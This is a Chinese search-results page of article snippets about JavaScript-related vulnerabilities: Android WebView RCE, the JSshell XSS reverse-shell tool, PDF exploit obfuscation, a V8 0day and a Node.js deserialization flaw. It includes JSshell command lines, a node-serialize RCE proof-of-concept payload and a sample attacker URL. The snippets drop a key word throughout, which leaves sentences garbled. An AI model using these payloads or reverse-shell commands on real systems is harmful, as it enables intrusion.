展开

关键词

黑客通过JavaScript破解谷歌眼镜

近日,一个存在于谷歌眼镜的安全被发现,能够让攻击者轻易执行任意代码。事实上,这个可以追溯到去年下半年安全研究人员在Android 4.1系统中发现的JavaScript API错误。 JavaScript功能。 简单地说,便是通过这个获得最高JavaScript权限。 在开源安全检测工具Metasploit最近的测试中,发现这个依然存在于最新的谷歌眼镜XE12软件版本中。 该对于谷歌眼镜的影响还是非常大的,因为很多Android免费应用程序都要使用WebView来加载HTML内容(如开发者网站、说明及广告),如果攻击者可以通过恶意的JavaScript代码来肆意修改HTML

57880

JSshell:一款针对XSSJavaScript反向Shell

JSshell是一个JavaScript反向Shell工具,该工具可以帮助广大研究人员远程利用XSS或扫描并发现XSS盲注。 跟JShell(一款由s0med3v开发的通过XSS获取JavaScript反向Shell的工具)相比,这是一个非常大的更新,而且JSshell还不需要Netcat的支持,这一点跟其他的JavaScript 1234js.py -s 48.586.1.23 -gjs.py -c alert(document.cookie) -w 10JSshell运行样例接下来,我们将给大家演示如何一步一步使用JSshell来利用XSS | |_|__)_> | |(_ | |v1.0Payload:Listening on 4848 for incoming JS shell ...接下来,将生成的Payload拷贝到存在XSS的网站 Got JS shell from port 39154 to DESKTOP-1GSL2O2 4848$ established$ the$ shell$$$ helpJSshell using javascript

30520
  • 广告
    关闭

    云加社区有奖调研

    参与社区用户调研,赢腾讯定制礼

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    关于Android中WebView远程代码执行浅析

    1.WebView 远程代码执行描述 Android API level 16以及之前的版本存在远程代码执行安全,该源于程序没有正确限制使用WebView.addJavascriptInterface 方法,远程攻击者可通过使用Java Reflection API利用该执行任意Java对象的方法,简单的说就是通过addJavascriptInterface给WebView加入一个JavaScript 方法注册可供JavaScript调用的Java对象; 使用WebView加载外部网页或者本地网页; Android系统版本低于4.2; 3)WebView 远程代码执行原理: Android系统通过 导致攻击者可以利用反射机制调用未注册的其它任何Java类,最终导致JavaScript能力的无限增强。攻击者利用该可以根据客户端能力为所欲为。 4.WebView 远程代码执行POC 1) 利用addJavascriptInterface方法注册可供JavaScript调用的java对象 “injectedObj”,利用反射机制调用Android

    92720

    上传恶意文件时无意泄露两个0-day,被研究人员抓个正着

    一个未知的黑客组织在向公开恶意软件扫描引擎上传一个用于攻击的 PDF 文件时,无意间泄露了两个 0-day 被研究人员捕获,并及时上报给厂商修复。? 被发现时还未完全成型ESET 研究员 Anton Cherepanov 在 3 月底分析海量恶意软件样本时,发现了这两个隐藏的,在发现之时,该神秘黑客组织仍在调整这两个。 Cherepanov 表示:“样本中不包含最终有效载荷,这意味着被发现时仍处于早期发展阶段。” 这个利用链可以说是黑客入侵的绝佳案例,但带来的危害并不大。因为其创建者在上传文件到已知病毒扫描引擎时出现失误,被研究人员及时发现。发现后,研究人员立刻向 Adobe 和微软汇报了相关问题。 微软上周在 5 月的补丁中修复了 CVE-2018-8120 ,Adobe 在 APSB18-09 上修复了 CVE-2018-4990 。提醒用户尽快安装更新。

    16710

    用哪种语言写的应用最严重?六大主流语言代码分析报告出炉

    该公司调查了用 .NET、C++、Java、JavaScript、PHP 或 Python 编写的应用程序的趋势。 JavaScript,Veracode 发现 31.5% 的应用至少有一个跨站脚本(XSS),而用 PHP 写的应用中有 74.6% 至少有一个 XSS 。 但是,用 JavaScript 写的应用仅有 9.6% 有非常严重的,Java 应用的数据为 24%。 Veracode 在其分析的 JavaScript 应用中发现的远远更少,但即使 JavaScript 有更安全的默认设置,庞大的 npm 生态系统中的 JavaScript 和 node.js 开源软件库是潜在的薄弱环节 还有一点,某些 JavaScript 软件库非常受欢迎,多达 80%-90% 的 JavaScript 应用在使用它们。Eng 说:「只要这些软件包中某一个包里有一个,你就继承了该风险。

    12710

    微软Outlook for Android移动应用的XSS分析

    今天分享的Writeup是关于Outlook for Andriod的存储型XSS,作者通过朋友发来的技术邮件偶然发现了该,历经长达几个月的复现构造,最终微软承认了该(CVE-2019-1105 发现原因2018年底的时候,我一个朋友发邮件请我帮忙分析他在研究的一些JavaScript代码,虽然我不做挖掘,但他发过来的邮件在我的手机上显示出了一些奇怪的东西。 这种安全问题相当可怕,要实现利用,攻击者只需发送一封包含有经过构造的JavaScript代码邮件给受害者,受害者用Outlook打开就会中招。 但遗憾的是,微软安全团队却复现不了该,我也陷入了难堪和困境,但这明显是真的啊,我又向微软安全团队发了一段我这边复现的视频,之后,我了解到有一名安全研究人员也上报了该,但根据POC,微软安全团队仍然没成功复现 厂商安全团队可以花费很多精力去复现一个,最终的推理会是,如果他们不能成功复现,那么攻击者也不太可能成功复现和利用。

    28320

    Web Security 之 DOM-based vulnerabilities

    当网站包含的 JavaScript 接受攻击者可控制的值(称为 source 源)并将其传递给一个危险函数(称为 sink 接收器)时,就会出现基于 DOM 的。 污染流许多基于 DOM 的可以追溯到客户端代码在处理攻击者可以控制的数据时存在问题。什么是污染流要利用或者缓解这些,首先要熟悉 source 源与 sink 接收器之间的污染流的基本概念。 攻击者可以构造如下的 URL 来利用此:https:www.innocent-website.comexample#https:www.evil-user.net 当受害者访问此 URL 时,JavaScript 这可能是一项复杂的任务,并且取决于要插入数据的上下文,它可能需要按照适当的顺序进行 JavaScript 转义,HTML 编码和 URL 编码。有关防止特定的措施,请参阅上表链接的相应页面。 如何利用 DOM-clobbering 某些 JavaScript 开发者经常会使用以下模式:var someObject = window.someObject || {}; 如果你能控制页面上的某些

    16810

    jQuery框架全总结及开发建议

    它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。 原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站。这也是最为被大众熟知的jQuery的一个。 -2018-9206在线环境: https:github.comvulnspyjQuery-File-Upload-9.22.0此被用于挂马进行博彩网站跳转,一次攻击实例如图: 0x03 原理原因是 编号:CVE-2019-11358影响版本:0x02 原理基础知识:JavaScript 对象就跟变量一样,但它不是存储一个值(var car =“Fiat”),而是可以包含基于预定义结构的多个值

    7.8K20

    Chrome和Edge远程代码执行0Day曝光

    Rajvardhan Agarwal推特截图Agarwal发布的,是基于Chromium内核的浏览器中V8 JavaScript引擎的远程代码执行,同时还发布了该的PoC(概念验证)。 当Chrome或Edge浏览器加载PoC HTML文件及其对应的JavaScript文件时,该可被利用来启动Windows计算器(calc.exe)程序。 该是一个已经公开披露的安全,但在当前的浏览器版本中还没有修补。Agarwal表示,在最新版本的V8 JavaScript引擎中该已经被修复,但目前还不清楚谷歌何时会更新Chrome浏览器。 好消息是,Chrome浏览器沙盒可以拦截该。但如果该与另一个进行链锁,就有可能躲过Chrome沙盒的检测。Chrome浏览器的沙盒是一道安全防线,可以防止远程代码执行在主机上启动程序。 谷歌预计在4月14日发布Chrome 90版本,希望在该版本中已被修复。有媒体已经就该向谷歌致信,但还未收到回复。

    26550

    隐写术 - 深入研究 PDF混淆

    ,我们发现另外一个在 PDF 中更加强大的混淆利用技术。 该使用 this.getPageNumWords() 以及 this.getPageNthWord() 来读取和执行隐藏为“内容”的 Javascript。 最终执行的 Javascript 是什么样的?在成功去混淆之后,这是一段真实的代码。?因此,我们确认这个利用为 CVE-2013-3346。此外,我们推断该样本和前一个来自同一作者,原因如下。 他们都利用相同的 (CVE-2013-3346)。这两个利用中 Javascript 代码的相似性。 我们之前在 PDF 中找不到任何提及此类技术的信息,因此我们相信这是第一次使用“隐写术”技术隐藏 PDF 。总结我们对这种技术印象深刻,这种技术非常适合 PDF 的恶意代码混淆。

    43320

    微软对外披露两个0day详情

    微软近日对外披露了两个0day详情,其中一个存在Adobe阅读器中,可被利用导致任意代码执行;另一个则允许任意代码在Windows kernel内存中提权执行。 Acrobatand Reader存在于PDF文档中,伪装成暗含JavaScript利用代码的恶意JPEG 2000图像,利用路径如下图所示:? 利用流程图如上图所示,利用过程分以下阶段:1.JavaScript枚举堆喷射(heap spray)内存;2.恶意JPEG 2000图片触发一个越界访问操作;3.一旦堆喷射枚举越界内存,就会调用访问操作 CMAP数组的越界索引结合JavaScript中的堆喷射技术,越界利用就会导致vftable进程的崩溃。?图4. 把控制权传递给已加载的DLL模块中的入口点Win32k **提权利用**Win32k提权(EoP)利用是从已加载的PE模块中运行,利用新的WindowsCVE-2018-8120对Windows

    15620

    Node.js反序列化远程代码执行(CVE-2017-5941)

    一.描述 Node.js是一个Javascript运行环境(runtime)。实际上它是对Google V8引擎进行了封装。V8引擎执行Javascript的速度非常快,性能非常好。 Node.js反序列化远程代码执行,Node.js的node-serialize库中存在一个,该通过传输JavaScript IIFE,利用恶意代码(未信任数据)达到反序列化远程任意代码执行的效果 二.危害攻击者可利用反序列化,通过构造Payload来实现远程攻击服务器来获得主机权限。三.影响范围Node.js全版本。 四.PoCvar serialize = require(node-serialize);var x ={rce:_$$ND_FUNC$$_function(){console.log(exploited )}()}serialize.unserialize(x);PoC可用于进一步验证

    58480

    HackerOne | GitLab中Wiki页面存储型XSS

    信息发现者:ryhmnlfj种类:存储型xss危害等级:高危状态:已修复前言Ryhmnlfj发现GitLab的Wiki特定的分层链接Markdown存在存储型XSS再现1、登录到GitLab2. :影响1、应过滤危险的链接属性javascript:alert(1);2、提交一个安全的HTTPHTTPS链接附加信息1、另一个特定Wiki的Markdown字符串..也会被转换为javascript :2、使用标题字符串像javascript:STRING_EXPECTED_REMOVING也会重现此。 转换JavaScript:3、攻击者可以用各种方式来替换title字符串javascript: (例如data:, vbscript:, 等)存在此的Gitlab版本信息为11.9.4-ee附加影响如果使用该创建的

    39550

    Android WebView挂马--各大厂商纷纷落马

    一、描述近期,微信等多款安卓流行应用曝出高危挂马:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友发送欺诈短信、通讯录和短信被窃取等严重后果。 在乌云平台上,包括安卓版微信、QQ、腾讯微博、QQ浏览器、快播、百度浏览器、金山浏览器等大批应用均被曝光同类型。 二、影响版本Android系统版本低于4.2三、原理点:WebView.addJavascriptInterface(Object obj, String interfaceName) ;触发条件 3、Android系统版本低于4.2原因:Android系统通过WebView.addJavascriptInterface方法注册可供javascript调用的java对象,以用于增强javascript 导致攻击者可以利用反射机制调用未注册的其它任何JAVA类,最终导致javascript能力的无限增强。攻击者利用该可以根据客户端能力为所欲为。

    50760

    黑客正在利用Firefox的0day攻击Tor用户(含Exploit)

    就在几天前,Tor官网上首次出现了关于一个未知的Firefox的消息。其中包含有数百行的利用代码(JavaScript),攻击者可以利用这份代码来攻击Tor浏览器的用户。 TheWack0lian在接受采访时表示:“此次的利用代码与2013年FBI所用的几乎是一样的,它用来执行恶意代码的也与2013年Tor浏览器中的几乎相同。 根据另外一位安全研究人员(JoshuaYabut)的分析报告,攻击者利用了一个所谓的用后释放(UAF),该需要使用JavaScript来触发。 如果用户仍然想使用Firefox的话,至少应该禁用访问网站的JavaScript脚本。除此之外,用户也应该停止使用Tor。 利用代码(代码详情请点击原文链接)下面这段JavaScript代码就是攻击者用来攻击Tor浏览器的利用代码。它由一个HTML页面和CSS文件构成,具体如下所示。

    56260

    Apache Solr DataImportHandler RCE

    0x02 分析从通告中来看,应该和DIH功能中的某个功能有关系,翻一翻DataImportHandler的手册,找到了疑似触发点,下面的代码功能是 ScriptTransformer 。 先去翻翻这个功能实现的代码,这里简单看看一些关键代码,代码jar包似乎就告诉我这个原因是什么了,我们看到了 javax.script.ScriptEngine; 。? 0x03 复现在Dataimport处填入payload?? 修复方案值得注意的是,官方给出的临时修复方案并不能缓解,当把相应index core的配置文件置为空时,dataimport的时候只是获取不到默认的配置,但是依然能够通过这个接口发送PoC,也依然能够触发 ,解决办法是把相应配置文件中的dataimport requestHandler全部注释并重启Solr服务器,或者选择升级才能彻底关闭这个接口缓解

    34710

    常说的XSS攻击是什么❓

    XSS)。 这种定义逐渐扩展到了持续性和非JavaScript语言的攻击。XSS早在上世纪90年代被发现和利用。包括Twitter,Facebook,MySpace,Youtube与Orkut等网站都中过招。 服务端对比基于DOM的XSS历史上XSS首先在服务端渲染页面的Web应用中被发现,但随着JavaScript与AJAX等技术发展,非持续性XSS的一个子类——基于DOM的XSS攻击出现,这种攻击不需要经由网站的服务器 JQuery在2011年曾曝出基于DOM的XSS,而这种的预防方法与一般的XSS预防方法相近,区别在于由JavaScript代码执行预防策略(如输入验证和字符转义)。 一些JavaScript框架内建了预防XSS攻击的策略——如Angular.JS。Self-XSSSelf-XSS不是严格意义上的XSS,它欺骗用户自己执行代码,尽管Web应用并没有

    44740

    Web安全需要会写代码吗?

    Web程序,是万千有Bug的Web程序中的一种。 黑盒测试Web程序的存在,是建立在Web程序运行的基础之上的。 Web安全中,最老生常谈种类:XSS注入。此程序的设计实现者,考虑了用户提供的正常的输入数据,没有更多的过滤不怀好意的用户,对程序提供进行XSS注入数据。 我们平时使用的攻击靶机程序,是人为故意写出各种的Web程序的集合。我们也来写一个,用Python代码快速的写出有安全隐患的Web程序,写一段具有XSS功能Web代码,如下。 从软件测试角度来说,Web渗透测试,就是针对有的Web程序进行的测试,有的Web程序,本质还是Web程序。 Web程序在现实世界由很多种语言实现,Python、PHP、JAVA、JavaScript等等语言实现。从白盒设计、代码审计的角度,能读懂Web代码、实现Web代码、更便于发现和理解Web程序的

    8720

    「安全工具」13个工具,用于检查开源依赖项的安全风险

    虽然这导致了其他安全存储库的出现,例如针对JavaScript Node.js特定的Node Security Project和针对Ruby特定的RubySec,但仍有许多项目和生态系统尚未得到很好的覆盖 RetireJS还为希望了解他们是否使用具有已知JavaScript库的JS开发人员提供了站点检查服务。 RetireJS从NIST NVD以及众多其他来源检索其信息,包括邮件列表,错误跟踪系统和流行JavaScript项目的博客。 依赖性检查支持Java,.NET,JavaScript和Ruby。该工具严格从NIST NVD检索其信息。 它不仅提供了检测JavaScript项目中已知的工具,还帮助用户使用Snyk创建的引导式升级和开源补丁来解决这些问题。Snyk有自己的数据库,它从NIST NVD和NSP获取数据。

    1.4K20

    JavaScript 框架安全报告2019

    该报告涵盖:Angular 和 React 核心项目的安全实践在对每个生态系统中的深入研究的基础上,得出的 Angular 和 React 模块生态系统的安全状态其他常见 JavaScript 前端框架替代方案 React 有一些安全;似乎经常会有在其核心库中被发现,并每两年披露一次。只有一个 React 核心项目分配了官方 CVE。CVE 根本没有列出任何关于 Angular 的报告。 有关 CVE 和安全的信息为了调查本报告中所涉及的每个生态系统的总体安全状况,我们讨论的因素包括在不同相关软件包中确定的安全。 并根据已知的情况(有时与已知进行比较)来审查和讨论这些。 在 CVE 编号颁发机构(CNA)维护的常见和披露(CVE)列表中,为已知分配了标识号,并为 CVE 标注了 CVSS 分数,以此来说明对所列的严重程度。

    33810

    相关产品

    • 漏洞扫描服务

      漏洞扫描服务

      漏洞扫描服务是用于网站漏洞监测的安全服务,为企业提供7×24小时准确、全面的漏洞监测服务,并为企业提供专业的修复建议, 从而避免漏洞被黑客利用,影响企业资产安全…

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券